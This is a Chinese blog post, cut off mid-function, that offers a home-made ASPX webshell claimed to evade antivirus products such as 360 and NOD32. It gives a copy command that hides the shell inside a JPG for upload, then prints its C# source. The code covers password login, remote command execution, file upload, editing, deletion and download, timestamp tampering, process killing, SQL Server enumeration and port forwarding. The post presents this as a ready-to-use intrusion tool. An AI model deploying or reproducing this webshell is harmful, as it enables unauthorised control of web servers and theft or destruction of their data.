亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式

最新推荐文章于 2023-05-07 16:02:25 发布
最新推荐文章于 2023-05-07 16:02:25 发布
阅读量1.6k 收藏
点赞数
始于C#,精于C&C++,醉心于Windows内核与Com组件安全研究
本文链接:https://blog.csdn.net/oShuangYue12/article/details/52967681
版权

作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy  f.jpg/b +x.aspx/a hez.jpg

       <br/>         <%@ Page Language="C#"  Debug="true" trace="false" validateRequest="false"  %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Net.Sockets" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
  
    <title>MyServerWebShell</title>
    <style type="text/css">
        A:link {
            COLOR: #000000;
            TEXT-DECORATION: None;
        }

        A:visited {
            COLOR: #000000;
            TEXT-DECORATION: None;
        }

        A:active {
            COLOR: #000000;
            TEXT-DECORATION: None;
        }

        A:hover {
            COLOR: #000000;
            TEXT-DECORATION: underline;
        }

        BODY {
            FONT-SIZE: 9pt;
            FONT-FAMILY: "Courier New";
        }
        table{border-collapse:collapse;}
        table td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;border-collapse:collapse;}
        table td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;border-collapse:collapse;}
        #nei {
            width: 500px;
            margin: 0px auto;
            overflow: hidden;
        }

        #su {
            width: 300px;
            margin: 0px auto;
            overflow: hidden;
        }

        #cmd {
            width: 500px;
            margin: 0px auto;
            overflow: hidden;
        }

        .Bin_DataGrid span {
            text-decoration: underline;
        }
    </style>
    <script type="text/C#" runat="server">
        public class PortForward
        {
            public string Localaddress;
            public int LocalPort;
            public string RemoteAddress;
            public int RemotePort;
            Socket ltcpClient;
            Socket rtcpClient;
            byte[] DPrPL = new byte[2048];
            byte[] wvZv = new byte[2048];
            public struct session
            {
                public Socket rdel;
                public Socket ldel;
                public int llen;
                public int rlen;
            }
            public static IPEndPoint mtJ(string host, int port)
            {
                IPEndPoint iep = null;
                IPHostEntry aGN = Dns.Resolve(host);
                IPAddress rmt = aGN.AddressList[0];
                iep = new IPEndPoint(rmt, port);
                return iep;
            }
            public void Start(string Rip, int Rport, string lip, int lport)
            {
                try
                {
                    LocalPort = lport;
                    RemoteAddress = Rip;
                    RemotePort = Rport;
                    Localaddress = lip;
                    rtcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    ltcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    rtcpClient.BeginConnect(mtJ(RemoteAddress, RemotePort), new AsyncCallback(iiGFO), rtcpClient);
                }
                catch (Exception ex) { }
            }

            protected void iiGFO(IAsyncResult ar)
            {
                try
                {
                    session RKXy = new session();
                    RKXy.ldel = ltcpClient;
                    RKXy.rdel = rtcpClient;
                    ltcpClient.BeginConnect(mtJ(Localaddress, LocalPort), new AsyncCallback(VTp), RKXy);
                }
                catch (Exception ex) { }
            }


            protected void VTp(IAsyncResult ar)
            {
                try
                {
                    session RKXy = (session)ar.AsyncState;
                    ltcpClient.EndConnect(ar);
                    RKXy.rdel.BeginReceive(DPrPL, 0, DPrPL.Length, SocketFlags.None, new AsyncCallback(LFYM), RKXy);
                    RKXy.ldel.BeginReceive(wvZv, 0, wvZv.Length, SocketFlags.None, new AsyncCallback(xPS), RKXy);
                }
                catch (Exception ex) { }
            }
            private void LFYM(IAsyncResult ar)
            {
                try
                {
                    session RKXy = (session)ar.AsyncState;
                    int Ret = RKXy.rdel.EndReceive(ar);
                    if (Ret > 0)
                        ltcpClient.BeginSend(DPrPL, 0, Ret, SocketFlags.None, new AsyncCallback(JTcp), RKXy);
                    else lyTOK();
                }
                catch (Exception ex) { }
            }
            private void JTcp(IAsyncResult ar)
            {
                try
                {
                    session RKXy = (session)ar.AsyncState;
                    RKXy.ldel.EndSend(ar);
                    RKXy.rdel.BeginReceive(DPrPL, 0, DPrPL.Length, SocketFlags.None, new AsyncCallback(this.LFYM), RKXy);
                }
                catch (Exception ex) { }
            }
            private void xPS(IAsyncResult ar)
            {
                try
                {
                    session RKXy = (session)ar.AsyncState;
                    int Ret = RKXy.ldel.EndReceive(ar);
                    if (Ret > 0)
                        RKXy.rdel.BeginSend(wvZv, 0, Ret, SocketFlags.None, new AsyncCallback(IZU), RKXy);
                    else lyTOK();
                }
                catch (Exception ex) { }
            }
            private void IZU(IAsyncResult ar)
            {
                try
                {
                    session RKXy = (session)ar.AsyncState;
                    RKXy.rdel.EndSend(ar);
                    RKXy.ldel.BeginReceive(wvZv, 0, wvZv.Length, SocketFlags.None, new AsyncCallback(this.xPS), RKXy);
                }
                catch (Exception ex) { }
            }
            public void lyTOK()
            {
                try
                {
                    if (ltcpClient != null)
                    {
                        ltcpClient.Close();
                    }
                    if (rtcpClient != null)
                        rtcpClient.Close();
                }
                catch (Exception ex) { }
            }
        }
    
    
    
        public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
        public string SessionName = "myshell";
        public string Bin_Action = "";
        public string Bin_Request = "";


        protected OleDbConnection conn = new OleDbConnection();
        protected OleDbCommand comm = new OleDbCommand();

        protected void Page_Load(object sender, EventArgs e)
        {

            if (Session[SessionName] != ("BIN"))
            {
                Bin_login();
            }
            else
            {
                if (!IsPostBack)
                {
                    Bin_main();
                }
                else
                {

                    Bin_Action = Request["goaction"];
                    if (Bin_Action == "del")
                    {
                        Bin_Request = Request["todo"];
                        Bin_Filedel(Bin_Request, 1);
                    }
                    if (Bin_Action == "change")
                    {
                        Bin_Request = Request["todo"];
                        Bin_FileList(Bin_Request);
                    }

                    if (Bin_Action == "kill")
                    {
                        Bin_Request = Request["todo"];
                        ForceKillProcess(Bin_Request);
                        Bin_main();
                    }
                    if (Bin_Action == "deldir")
                    {
                        Bin_Request = Request["todo"];
                        Bin_Filedel(Bin_Request, 2);
                    }
                    if (Bin_Action == "down")
                    {
                        Bin_Request = Request["todo"];
                        Bin_Filedown(Bin_Request);
                    }
                    if (Bin_Action == "rename")
                    {
                        Bin_Request = Request["todo"];
                        Bin_FileRN(Bin_Request, 1);
                    }
                    if (Bin_Action == "renamedir")
                    {
                        Bin_Request = Request["todo"];
                        Bin_FileRN(Bin_Request, 2);
                    }
                    if (Bin_Action == "showatt")
                    {
                        Bin_Request = Request["todo"];
                        Bin_Fileatt(Bin_Request);
                    }
                    if (Bin_Action == "edit")
                    {
                        Bin_Request = Request["todo"];
                        Bin_FileEdit(Bin_Request);
                    }
                    if (Bin_Action == "postdata")
                    {

                        Bin_Request = Request["todo"];
                        Session["Bin_Table"] = Bin_Request;
                        Bin_DataGrid.CurrentPageIndex = 0;
                        Bin_DBstrTextBox.Text = "";
                        Bin_Databind();
                    }


                    if (Bin_Action == "postdatabase")
                    {

                        Bin_Request = Request["todo"];
                        Session["Bin_Database"] = Bin_Request;
                        Bin_Accbind();
                    }


                    if (Bin_Action == "changedata")
                    {
                        Session["Bin_Table"] = null;
                        Bin_Request = Request["todo"];
                        Session["Bin_Option"] = Request["intext"];
                        Bin_Change();
                        Bin_DBinfoLabel.Visible = false;
                        Bin_DBstrTextBox.Text = Bin_Request;

                    }


                }
            }
        }


        private void ForceKillProcess(string pid)
        {
            try
            {
                Process.GetProcessById(Int32.Parse(pid)).Kill();
            }
            catch (Exception)
            {


            }
        }
        public void Bin_login()
        {
            Bin_LoginPanel.Visible = true;
            Bin_MainPanel.Visible = false;
            Bin_MenuPanel.Visible = false;
            Bin_FilePanel.Visible = false;
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = false;
            Bin_PortPanel.Visible = false;

            hOWTm.Visible = false;

        }
        public void Bin_main()
        {
            TimeLabel.Text = "服务器时间:" + DateTime.Now.ToString();
            Bin_PortPanel.Visible = false;

            Bin_LoginPanel.Visible = false;
            Bin_MainPanel.Visible = true;
            Bin_MenuPanel.Visible = true;
            Bin_FilePanel.Visible = false;
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = false;
            hOWTm.Visible = false;

            string ServerIP = "IP地址 : " + Request.ServerVariables["LOCAL_ADDR"] + "<br>";
            string HostName = "服务器名称 : " + Environment.MachineName + "<br>";
            string OS = "操作系统 : " + Environment.OSVersion + "</br>";
            string IISversion = "IIS版本 : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
            string PATH_INFO = "目录路径 : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
            InfoLabel.Text = "<hr><center><b><U>系统信息</U></B></center>";
            InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
            InfoLabel.Text += Bin_Process() + "<hr>";

        }
        private bool CheckIsNumber(string sSrc)
        {
            System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");

            if (reg.IsMatch(sSrc))
            {
                return true;
            }
            else
            {
                return false;
            }
        }

        public string Bin_Process()
        {
            string htmlstr = "<input type=hidden name=goaction><input type=hidden name=todo><center><b><U>进程信息</U></B></center><TABLE width=99% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>进程</B></TD><TD align=left width=20%><B>内存使用</B></TD><TD align=center width=10%><B>线程</B></TD><TD align=center width=10%><B>操作</B></TD></TR>";
            string prostr = "";
            string htmlend = "</TR></TABLE>";
            try
            {
                Process[] myprocess = Process.GetProcesses();
                foreach (Process p in myprocess)
                {
                    prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
                    prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
                    prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
                    prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";

                    prostr += "<TD align=center><a href=javascript:Command('kill','" + p.Id.ToString() + "') style='color:blue;text-decoration:underline''>kill</a></TD>";
                }
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            return htmlstr + prostr + htmlend;
        }
        protected void LoginButton_Click(object sender, EventArgs e)
        {
            string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text, "MD5").ToLower();
            if (MD5Pass == Password)
            {
                Session[SessionName] = "BIN";
                Bin_main();
            }
            else
            {
                Bin_login();
            }
        }

        protected void LogoutButton_Click(object sender, EventArgs e)
        {
            Session.Abandon();
            Bin_login();
        }

        protected void FileButton_Click(object sender, EventArgs e)
        {
            Bin_LoginPanel.Visible = false;
            Bin_MenuPanel.Visible = true;
            Bin_MainPanel.Visible = false;
            Bin_FilePanel.Visible = true;
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = false;
            Bin_PortPanel.Visible = false;

            hOWTm.Visible = false;

            Bin_upTextBox.Text = formatpath(Server.MapPath("."));
            Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
            Bin_upTextBox.Text = formatpath(Server.MapPath("."));
            Bin_FileList(Server.MapPath("."));

        }

        protected void MainButton_Click(object sender, EventArgs e)
        {
            Bin_main();
        }
        public void Bin_DriveList()
        {
            string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
            file += "<hr>驱动器 : ";
            string[] drivers = Directory.GetLogicalDrives();
            for (int i = 0; i < drivers.Length; i++)
            {
                file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a> ";
            }
            file += "    起始目录 :  <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
            Bin_FileLabel.Text = file;
        }

        public void Bin_FileList(string Bin_path)
        {
            Bin_FilePanel.Visible = true;
            Bin_CreateTextBox.Text = "";
            Bin_CopytoTextBox.Text = "";
            Bin_CopyTextBox.Text = Bin_path;
            Bin_upTextBox.Text = Bin_path;

            Bin_DriveList();
            string tmpstr = "";
            string Bin_Filelist = Bin_FilelistLabel.Text;
            Bin_Filelist = "<hr>";
            Bin_Filelist += "<table width=99% border=0 align=center>";
            Bin_Filelist += "<tr><td width=40%><b>文件名</b></td><td width=10%><b>大小(字节)</b></td>";
            Bin_Filelist += "<td  width='160px'><b>修改日期</b></td><td width=30%><b>操作</b></td></tr>";
            try
            {
                Bin_Filelist += "<tr><td colspan='4'>";
                string parstr = "";
                if (Bin_path.Length < 4)
                {
                    parstr = formatpath(Bin_path);

                }
                else
                {
                    parstr = formatpath(Directory.GetParent(Bin_path).ToString());

                }
                Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|上级目录|</a></b></i>";
                Bin_Filelist += "</td></tr>";

                DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
                foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
                {
                    string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
                    tmpstr += "<tr>";
                    tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i><文件夹></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>重命名目录</a>|<a href=javascript:Command('showatt','" + foldername + "/');>属性</a>|<a href=javascript:Command('deldir','" + foldername + "');>删除目录</a></td>";
                    tmpstr += "</tr>";
                }
                foreach (FileInfo Bin_file in Bin_dir.GetFiles())
                {
                    string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
                    tmpstr += "<tr>";
                    tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>编辑</a>|<a href=javascript:Command('rename','" + filename + "');>重命名文件</a>|<a href=javascript:Command('down','" + filename + "');>下载</a>|<a href=javascript:Command('showatt','" + filename + "');>属性</a>|<a href=javascript:Command('del','" + filename + "');>删除</a></td>";
                    tmpstr += "</tr>";
                }
                tmpstr += "</talbe>";
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);

            }

            Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
        }
        public void Bin_Filedel(string instr, int type)
        {
            try
            {
                if (type == 1)
                {
                    File.Delete(instr);
                }
                if (type == 2)
                {
                    foreach (string tmp in Directory.GetFileSystemEntries(instr))
                    {
                        if (File.Exists(tmp))
                        {
                            File.Delete(tmp);
                        }
                        else
                        {
                            Bin_Filedel(tmp, 2);
                        }
                    }
                    Directory.Delete(instr);
                }
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
        }
        public void Bin_FileRN(string instr, int type)
        {
            try
            {
                if (type == 1)
                {
                    string[] array = instr.Split(',');

                    File.Move(array[0], array[1]);
                }
                if (type == 2)
                {
                    string[] array = instr.Split(',');
                    Directory.Move(array[0], array[1]);
                }
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
        }
        public void Bin_Filedown(string instr)
        {
            try
            {
                FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
                long FileSize = MyFileStream.Length;
                byte[] Buffer = new byte[(int)FileSize];
                MyFileStream.Read(Buffer, 0, (int)FileSize);
                MyFileStream.Close();
                Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
                Response.Charset = "UTF-8";
                Response.ContentType = "application/octet-stream";
                Response.BinaryWrite(Buffer);
                Response.Flush();
                Response.End();
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }

        }
        public void Bin_Fileatt(string instr)
        {
            Bin_AttPanel.Visible = true;
            Bin_FilePanel.Visible = true;
            try
            {
                string Att = File.GetAttributes(instr).ToString();
                Bin_ReadOnlyCheckBox.Checked = false;
                Bin_SystemCheckBox.Checked = false;
                Bin_HiddenCheckBox.Checked = false;
                Bin_ArchiveCheckBox.Checked = false;

                if (Att.LastIndexOf("ReadOnly") != -1)
                {
                    Bin_ReadOnlyCheckBox.Checked = true;
                }
                if (Att.LastIndexOf("System") != -1)
                {
                    Bin_SystemCheckBox.Checked = true;
                }
                if (Att.LastIndexOf("Hidden") != -1)
                {
                    Bin_HiddenCheckBox.Checked = true;
                }
                if (Att.LastIndexOf("Archive") != -1)
                {
                    Bin_ArchiveCheckBox.Checked = true;
                }
                Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
                Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
                Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_AttLabel.Text = instr;
            Session["FileName"] = instr;
            Bin_DriveList();
        }
        public void Bin_FileEdit(string instr)
        {
            Bin_FilePanel.Visible = true;
            Bin_EditPanel.Visible = true;
            Bin_DriveList();
            Bin_EditpathTextBox.Text = instr;
            StreamReader SR = new StreamReader(instr, Encoding.Default);
            Bin_EditTextBox.Text = SR.ReadToEnd();
            SR.Close();
        }

        protected void Bin_upButton_Click(object sender, EventArgs e)
        {

            string uppath = Bin_upTextBox.Text;
            if (uppath.Substring(uppath.Length - 1, 1) != @"/")
            {
                uppath = uppath + @"/";
            }
            try
            {
                Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value));

            }
            catch (Exception error)
            {
                Bin_Error(error.Message);
            }
            Bin_FileList(uppath);
        }
        public void Bin_Error(string error)
        {
            Bin_ErrorLabel.Text = "Error : " + error;
        }
        public string formatpath(string instr)
        {
            instr = instr.Replace(@"\", "/");
            if (instr.Length < 4)
            {
                instr = instr.Replace(@"/", "");
            }
            if (instr.Length == 2)
            {
                instr = instr + @"/";
            }
            instr = instr.Replace(" ", "%20");
            return instr;
        }
        public string formatfile(string instr)
        {
            instr = instr.Replace(" ", "%20");
            return instr;

        }
        protected void Bin_GoButton_Click(object sender, EventArgs e)
        {
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_NewFileButton_Click(object sender, EventArgs e)
        {
            string newfile = Bin_CreateTextBox.Text;
            string filepath = Bin_upTextBox.Text;
            filepath = filepath + "/" + newfile;
            try
            {
                StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default);

            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_NewdirButton_Click(object sender, EventArgs e)
        {
            string dirpath = Bin_upTextBox.Text;
            string newdir = Bin_CreateTextBox.Text;
            newdir = dirpath + "/" + newdir;
            try
            {
                Directory.CreateDirectory(newdir);

            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_CopyButton_Click(object sender, EventArgs e)
        {
            string copystr = Bin_CopyTextBox.Text;
            string copyto = Bin_CopytoTextBox.Text;
            try
            {
                File.Copy(copystr, copyto);
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_CopytoTextBox.Text = "";
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_CutButton_Click(object sender, EventArgs e)
        {
            string copystr = Bin_CopyTextBox.Text;
            string copyto = Bin_CopytoTextBox.Text;
            try
            {
                File.Move(copystr, copyto);
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_CopytoTextBox.Text = "";
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_SetButton_Click(object sender, EventArgs e)
        {
            try
            {
                string FileName = Session["FileName"].ToString();
                File.SetAttributes(FileName, FileAttributes.Normal);
                if (Bin_ReadOnlyCheckBox.Checked)
                {
                    File.SetAttributes(FileName, FileAttributes.ReadOnly);
                }

                if (Bin_SystemCheckBox.Checked)
                {
                    File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
                }
                if (Bin_HiddenCheckBox.Checked)
                {
                    File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
                }
                if (Bin_ArchiveCheckBox.Checked)
                {
                    File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
                }
                if (FileName.Substring(FileName.Length - 1, 1) == "/")
                {
                    Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
                    Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
                    Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
                }
                else
                {
                    File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
                    File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
                    File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
                }
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
            Response.Write("<script>alert('Success!')</sc" + "ript>");
        }

        protected void Bin_EditButton_Click(object sender, EventArgs e)
        {
            try
            {
                StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
                SW.Write(Bin_EditTextBox.Text);
                SW.Close();
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
            Bin_FileList(Bin_upTextBox.Text);
            Response.Write("<script>alert('Success!')</sc" + "ript>");

        }

        protected void Bin_BackButton_Click(object sender, EventArgs e)
        {
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_SbackButton_Click(object sender, EventArgs e)
        {
            Bin_FileList(Bin_upTextBox.Text);
        }

        protected void Bin_CmdButton_Click(object sender, EventArgs e)
        {
            Bin_MenuPanel.Visible = true;
            Bin_LoginPanel.Visible = false;
            Bin_CmdPanel.Visible = true;
            Bin_SQLPanel.Visible = false;
            Bin_CmdLabel.Text = "";
            Bin_PortPanel.Visible = false;


            hOWTm.Visible = false;
        }

        protected void Bin_RunButton_Click(object sender, EventArgs e)
        {
            try
            {
                Process Cmdpro = new Process();
                Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
                Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
                Cmdpro.StartInfo.UseShellExecute = false;
                Cmdpro.StartInfo.RedirectStandardInput = true;
                Cmdpro.StartInfo.RedirectStandardOutput = true;
                Cmdpro.StartInfo.RedirectStandardError = true;
                Cmdpro.Start();
                string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
                cmdstr = cmdstr.Replace("<", "<");
                cmdstr = cmdstr.Replace(">", ">");
                Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
        }

        protected void Bin_SQLButton_Click(object sender, EventArgs e)
        {
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = true;
            Bin_LoginPanel.Visible = false;
            Bin_MenuPanel.Visible = true;
            Bin_AccPanel.Visible = false;
            Bin_Scroll.Visible = false;
            Bin_DBmenuPanel.Visible = false;

            Bin_PortPanel.Visible = false;

            hOWTm.Visible = false;

        }


        protected void OpenConnection()
        {
            if (conn.State == ConnectionState.Closed)
            {
                try
                {
                    conn.ConnectionString = Bin_SQLconnTextBox.Text;

                    comm.Connection = conn;
                    conn.Open();
                    if (Session["Bin_DataBase"] != null)
                    {


                        conn.ChangeDatabase(Session["Bin_DataBase"].ToString());
                    }
                }
                catch (Exception Error)
                {
                    Bin_Error(Error.Message);
                }
            }
        }
        protected void CloseConnection()
        {
            if (conn.State == ConnectionState.Open)
                conn.Close();
            conn.Dispose();
            comm.Dispose();
        }
        public DataTable Bin_DataTable(string sqlstr)
        {
            OleDbDataAdapter da = new OleDbDataAdapter();
            DataTable datatable = new DataTable();
            try
            {
                OpenConnection();
                comm.CommandType = CommandType.Text;
                comm.CommandText = sqlstr;
                da.SelectCommand = comm;
                da.Fill(datatable);
            }
            catch (Exception)
            {
            }
            finally
            {
                CloseConnection();
            }
            return datatable;
        }
        protected void SQL_SumbitButton_Click(object sender, EventArgs e)
        {
            try
            {
                Session["Bin_Table"] = null;
                Bin_DataGrid.CurrentPageIndex = 0;
                Bin_DataGrid.AllowPaging = true;

                Bin_DBmenuPanel.Visible = true;
                Bin_DBinfoLabel.Visible = true;
                Bin_AccPanel.Visible = false;
                Bin_Scroll.Visible = false;

                OpenConnection();
                DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
                DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
                DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
                DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
                DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
                Session["dbs"] = dbs;
                string dbo = "";
                if (owner.Rows[0][0].ToString() == "1")
                {
                    dbo = "db_owner";
                }
                else
                {
                    dbo = "public";
                }
                if (rol.Rows[0][0].ToString() == "1")
                {
                    dbo = "<font color=blue>sa</font>";
                }
                string db_info = "";
                db_info = "<i><b><font color=red>数据库版本</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>";
                string db_name = "";
                for (int i = 0; i < dbs.Rows.Count; i++)
                {
                    db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + " | ";
                }
                db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
                db_info += "<i><b><font color=red>数据权限名称</font></i></b> : " + dbo + "<hr>";
                Bin_DBinfoLabel.Text = db_info;


            }
            catch (Exception E)
            {
                Bin_Error(E.Message);
            }
        }

        protected void Bin_Accbind()
        {
            try
            {
                Bin_SAexecButton.Visible = false;
                Bin_DBmenuPanel.Visible = false;
                Bin_AccPanel.Visible = true;
                OpenConnection();
                DataTable acctable = new DataTable();
                acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new object[] { Session["Bin_DataBase"], null, null, "TABLE" });
                string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
                accstr += "表总数 : " + acctable.Rows.Count + "<br>选择数据库和表名 : <SELECT οnchange=if(this.value!='')Command('postdatabase',this);>";



                if (Session["dbs"] != null)
                {
                    DataTable dbs = Session["dbs"] as DataTable;
                    for (int i = 0; i < dbs.Rows.Count; i++)
                    {
                        if (Session["Bin_DataBase"] != null)
                        {


                            accstr += "<option value=" + dbs.Rows[i].ItemArray[0].ToString() + (dbs.Rows[i].ItemArray[0].ToString() == Session["Bin_DataBase"].ToString() ? " selected='selected'" : "") + ">" + dbs.Rows[i].ItemArray[0].ToString() + "</option>";
                        }
                        else
                        {
                            accstr += "<option value=" + dbs.Rows[i].ItemArray[0].ToString() + ">" + dbs.Rows[i].ItemArray[0].ToString() + "</option>";


                        }
                    }
                }
                accstr += "</SELECT><SELECT οnchange=if(this.value!='')Command('postdata',this);>";
                for (int i = 0; i < acctable.Rows.Count; i++)
                {
                    if (Session["Bin_Table"] != null)
                    {
                        accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + (acctable.Rows[i].ItemArray[2].ToString() == Session["Bin_Table"].ToString() ? " selected='selected'" : "") + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>";
                    }
                    else
                    {

                        accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>";
                    }

                }
                accstr += "</SELECT>";
                Bin_AccinfoLabel.Text = accstr;
                CloseConnection();
            }
            catch (Exception Error)
            {
                Bin_Error(Error.Message);
            }
        }
        protected void Bin_Databind()
        {
            try
            {
                Bin_SAexecButton.Visible = false;
                Bin_Accbind();
                Bin_Scroll.Visible = true;

                Bin_DBmenuPanel.Visible = true;
                Bin_DBinfoLabel.Visible = false;

                Bin_DataGrid.Visible = true;
                Bin_DBstrTextBox.Text = @"SELECT * FROM " + Session["Bin_Table"];
                DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
                Bin_DataGrid.DataSource = databind;
                Bin_DataGrid.DataBind();
            }
            catch (Exception Error)
            {

                Bin_Error(Error.Message);
            }
        }




        public void Bin_ExecSql(string instr)
        {
            try
            {
                OpenConnection();
                comm.CommandType = CommandType.Text;
                comm.CommandText = instr;
                comm.ExecuteNonQuery();
            }
            catch (Exception e)
            {
                Bin_Error(e.Message);
            }
        }
        public void Item_DataBound(object sender, DataGridItemEventArgs e)
        {

            for (int i = 2; i < e.Item.Cells.Count; i++)
            {
                e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">");
            }

        }
        protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
        {
            Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
            Bin_Databind();
        }
        public void Item_Command(object sender, DataGridCommandEventArgs e)
        {
            if (e.CommandName == "Cancel")
            {
                Bin_DataGrid.EditItemIndex = -1;
                Bin_Databind();
            }
        }

        protected void Bin_ExecButton_Click(object sender, EventArgs e)
        {
            try
            {
                hOWTm.Visible = false;
